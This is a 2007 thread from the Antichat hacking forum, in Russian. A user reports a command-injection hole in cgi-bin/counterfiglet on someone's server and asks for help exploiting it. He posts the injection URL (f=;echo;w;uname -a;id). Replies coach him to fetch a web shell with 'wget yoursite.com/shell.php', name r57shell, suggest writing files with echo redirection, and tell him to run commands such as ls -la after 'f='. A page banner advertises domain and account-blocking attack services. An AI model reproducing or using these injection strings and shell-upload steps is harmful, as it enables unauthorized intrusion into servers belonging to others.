Дыра cgi-bin/counterfiglet....

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Дыра cgi-bin/counterfiglet....

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Дыра cgi-bin/counterfiglet....

08.02.2007, 00:14

vipklient

Новичок

Регистрация: 07.02.2007

Сообщений: 8

С нами: 10134522

Репутация: 0

Дыра cgi-bin/counterfiglet....

Нашёл дыру на одном сервере вот такого типа: cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id...
Прочитал об этой дыре много... С её помошью можно залить на сервак Shell... Проблема в том что сам Shell найти немогу. Нашёл когдато здесь на форуме PHP сплойт под эту дыру, а скомпилить неполучается... Да даже дело не в скомпилить, просто я её поошибке затёр. И сейчас немогу найти его.Помоему инекция конкретно работает с этой дырой. Вообщем: Помогите мне воспользоватся этой дырой, своими советами и подсказками. Shell бы тоже непомишал. Или на худой конец помогите найти здесь на форуме Php сплойт для данной дыры.

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось vipklient; 08.02.2007 в 00:16..

08.02.2007, 00:34

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

ты команды можешь исполнять что еще тебе надо?

08.02.2007, 00:48

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

С нами: 10188506

Репутация: 861

wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате

08.02.2007, 00:56

vipklient

Новичок

Регистрация: 07.02.2007

Сообщений: 8

С нами: 10134522

Репутация: 0

Цитата:

Сообщение от [ cash ]

ты команды можешь исполнять что еще тебе надо?

А поподобнее можно...

08.02.2007, 01:06

vipklient

Новичок

Регистрация: 07.02.2007

Сообщений: 8

С нами: 10134522

Репутация: 0

Цитата:

Сообщение от n0ne

wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате

Напиши плз. как правелно залить r57shell.

08.02.2007, 01:11

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Для начало тебе нужна папка с правами на запись.
Если разрешенно записывать в папку с самим cgi скриптом то туда надо закинуть cgi shell.
Вообще определись что тебе попробуй команды типо echо 123>123.php а вообще можно полноценно лазить как через шелл... просто исполняя команды так...
2n0ne
Гениально

08.02.2007, 01:25

vipklient

Новичок

Регистрация: 07.02.2007

Сообщений: 8

С нами: 10134522

Репутация: 0

А если без шелла. Как найти команды которые он будет воспринимать?

08.02.2007, 01:31

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

все команды nix систем..
Если там nix...

08.02.2007, 01:36

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

С нами: 10408706

Репутация: 4451

Ради интереса вбил в поисковик counterfiglet нашел вот это http://herurg.chat.ru/counterfiglet.txt . Внимания заслуживает дата 1995

#10

08.02.2007, 18:08

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

С нами: 10188506

Репутация: 861

[ cash ], уху)) я такой

Автор, после "f=" пишешь команду)
попробуй "ls -la" без кавычек, ответ есть?
и если, как ты написал, тебе сервер не отвечает, с чего ты взял что ты можешь там что-то исполнять?))

Страница 1 из 2

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Новая дыра в Windows может оказаться опаснее, чем считалось ранее	system_32	Мировые новости. Обсуждения.	2	22.09.2006 18:16
В Microsoft Outlook Express найдена опасная дыра	DRON-ANARCHY	Мировые новости. Обсуждения.	3	16.06.2005 23:02
cgi скрипты на .h12.ru	Майор	С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby	7	16.02.2005 19:16
Дыра в phpbb привела к массовым взломам сайтов	ФРАЙ	Мировые новости. Обсуждения.	7	19.12.2004 08:10

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход